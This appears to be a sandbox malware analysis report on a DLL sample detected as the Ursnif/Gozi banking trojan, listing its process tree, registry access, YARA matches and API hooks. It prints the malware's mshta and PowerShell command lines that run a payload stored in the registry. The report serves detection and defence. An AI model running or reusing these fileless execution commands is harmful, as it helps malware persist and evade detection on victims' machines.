Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05413604	2_2_05413604
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0542086C	2_2_0542086C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05414804	2_2_05414804
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540C307	2_2_0540C307
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540BBA1	2_2_0540BBA1

Source: mu1rnx1a.dll.27.dr	Static PE information: No import functions for PE file found
Source: yacmzdf3.dll.30.dr	Static PE information: No import functions for PE file found

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll			Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptdlg.dll

Source: NJPcHPuRcG.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY

Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html

Source: NJPcHPuRcG.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.bank.troj.spyw.evad.winDLL@36/159@18/3

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_027731DD CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,

2_2_027731DD

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{75BD31D2-7017-11EB-90E5-ECF4BB570DC9}.dat

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{8AE918E3-61CB-4CED-3B5E-25409F722974}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5148:120:WilError_01
Source: C:\Windows\SysWOW64\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{F653DE64-DD3A-98FE-178A-614C3B5E2540}

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DFD1DF0FD1C3CEAF12.TMP

Jump to behavior

Source: NJPcHPuRcG.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Source: NJPcHPuRcG.dll

Virustotal: Detection: 15%

Source: regsvr32.exe

String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\NJPcHPuRcG.dll'
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\NJPcHPuRcG.dll
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:82962 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17422 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17430 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES78AB.tmp' 'c:\Users\user\AppData\Local\Temp\mu1rnx1a\CSC6647FE8FE542539CE2919E5B6D2D1D.TMP'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8CA0.tmp' 'c:\Users\user\AppData\Local\Temp\yacmzdf3\CSCE6DA2C7C1B814D8F891E10CFF0A5BBCE.TMP'
Source: unknown	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\NJPcHPuRcG.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:82962 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17422 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17430 /prefetch:2	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES78AB.tmp' 'c:\Users\user\AppData\Local\Temp\mu1rnx1a\CSC6647FE8FE542539CE2919E5B6D2D1D.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8CA0.tmp' 'c:\Users\user\AppData\Local\Temp\yacmzdf3\CSCE6DA2C7C1B814D8F891E10CFF0A5BBCE.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\explorer.exe

File opened: C:\Windows\SYSTEM32\msftedit.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: NJPcHPuRcG.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: NJPcHPuRcG.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: NJPcHPuRcG.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: NJPcHPuRcG.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: NJPcHPuRcG.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: NJPcHPuRcG.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: NJPcHPuRcG.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001B.00000002.386301089.000001BF2C130000.00000002.00000001.sdmp, csc.exe, 0000001E.00000002.395773551.0000021C02EB0000.00000002.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000024.00000000.426711747.0000000006FE0000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: regsvr32.exe, 00000002.00000003.399265085.0000000005970000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: explorer.exe, 00000024.00000003.471981638.0000000006C40000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000002.00000003.399265085.0000000005970000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: explorer.exe, 00000024.00000003.471981638.0000000006C40000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000024.00000000.426711747.0000000006FE0000.00000002.00000001.sdmp

Source: NJPcHPuRcG.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: NJPcHPuRcG.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: NJPcHPuRcG.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: NJPcHPuRcG.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: NJPcHPuRcG.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_0542556E LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_0542556E

Source: unknown

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\NJPcHPuRcG.dll

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0277AF23 push ecx; ret	2_2_0277AF33
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0277ABF0 push ecx; ret	2_2_0277ABF9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0542769F push ecx; ret	2_2_054276AF

Source: initial sample

Static PE information: section name: .text entropy: 6.87914884899

Persistence and Installation Behavior:

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328320558.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328226726.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328337032.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328359150.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328350143.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328266588.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328300905.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.336044765.0000000004DBB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6448, type: MEMORY

Hooks registry keys query functions (used to hide registry keys)

Show sources

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the export address table of user mode modules (user mode EAT hooks)

Show sources

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C

Modifies the import address table of user mode modules (user mode IAT hooks)

Show sources

Source: explorer.exe

EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
